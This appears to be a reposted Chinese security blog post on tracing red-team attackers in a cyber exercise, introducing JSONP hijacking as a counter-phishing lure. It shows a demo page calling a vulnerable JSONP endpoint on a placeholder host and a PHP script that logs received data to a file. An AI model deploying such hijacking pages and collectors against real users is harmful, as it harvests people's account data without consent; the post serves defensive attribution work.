记一次某大型活动溯源红队身份

谢公子

发布于 2022-01-20 15:23:18

2K0

发布于 2022-01-20 15:23:18

文章被收录于专栏：谢公子学安全谢公子学安全

以下文章来源于酒仙桥六号部队，作者雪狼别动队

这是 酒仙桥六号部队 的第 86 篇文章。

全文共计1624个字，预计阅读时长6分钟。

背景

网络安全的本质是攻防对抗，而某大型活动是以红蓝对抗的形式组织开展的活动，其目的是在红队与蓝队的对抗中提升网络安全。

目的

在某大型活动中蓝方经常扮演的角色是被动挨打，但是如果我们能够掌握足够的技术手段，则可以变被动防守为主动出击，如反攻攻击方主机，溯源攻击方真实身份\虚拟身份等。

溯源思路

说到溯源攻击方，一般有几种思路：

1、溯源真实的攻击方IP，在攻防活动中攻击方使用代理IP，代理服务器屡见不鲜，那么识别到真实的攻击方IP，是溯源活动中一项必不可少的动作，这里一般是识别代理ip中的X-FOWARED-FOR字段来识别攻击者的真实IP，或以攻击代理服务器，拿下代理服务器后查看网络连接确定真实IP，但此过程较为复杂。

2、对攻击方实施反钓鱼手段，如部署互联网系统，诱使攻击方攻击，在互联网系统内添加钓鱼内容，使攻击方在访问时获取攻击方的真实信息；如在获取到攻击方的钓鱼邮件后，使用钓鱼邮箱点击或主动上钩，并在钓鱼邮箱内添加存在漏洞的应用，或其他word、excel等。本篇溯源文章主要讲述此种方法。

json hi jacking攻击

首先我们介绍一下json hi jacking攻击，json hi jacking是一种劫持攻击，在攻击者点击到存在json hi jacking攻击的页面时，触发跨域获取数据的接口（jsonp），获取到攻击者的浏览器cookie内存储的数据，如百度、爱奇艺、微博等。Json hi jacking类似于csrf攻击。

Jsonp是一种非官方的协议，是Web前端JavaScript跨域获取数据的一种方式，一般在读写数据时，有同源的策略限制，不允许读写其它域的数据，不过我们可以利用JavaScript的src属性，来绕过此限制，以达到跨域获取数据的目的，如以下代码：

测试前端

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<title>apppppppp</title>

<script src="http://xxx.com/api/jsonp.php? callback=jsonp1&other=xxx "></script> <!--调用存在jsonp劫持的api-->
<script>function test(obj){ <!--定义函数，接收jsonp劫持的api返回的数据-->
alert(JSON.stringify(obj));<!--弹窗jsonp返回的数据，并在弹窗内部使用JSON.stringify将avaScript值转为json字符串-->
}
test(jsonp1)<!--调用函数-->
</script>

</head>
</html>

后端data.php接收代码
<?php 
$data = $_GET['data'];//接收data数据
var_dump($data);
$fp = fopen('data.txt','a');//向data.txt中写入data数据
$fpp = fwrite($fp,$data."\r\n");
?>